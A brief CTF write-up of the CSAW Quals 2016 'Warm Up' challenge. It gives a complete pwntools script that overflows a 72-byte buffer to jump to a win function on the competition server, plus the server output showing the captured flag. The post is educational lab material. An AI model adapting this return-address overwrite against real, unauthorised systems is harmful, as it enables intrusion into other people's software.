Posted on by and filed under CSAW Quals 2016.

This was a very easy challenge. Basically, there was a win function at the address that is bring printed : 0x40060D. This function can be called with a simple buffer overflow. Here is my Exploit.py


from pwn import *

win = 0x40060D

payload = "A"*72
payload += p64(win)
con = remote('pwn.chal.csaw.io',8000)

print con.recvline()
print con.recvline()
con.sendline(payload)
print con.recvline()
Which gave me the flag
[+] Opening connection to pwn.chal.csaw.io on port 8000: Done
-Warm Up-

WOW:0x40060d

>FLAG{LET_US_BEGIN_CSAW_2016}

[*] Closed connection to pwn.chal.csaw.io port 8000
View the original post here.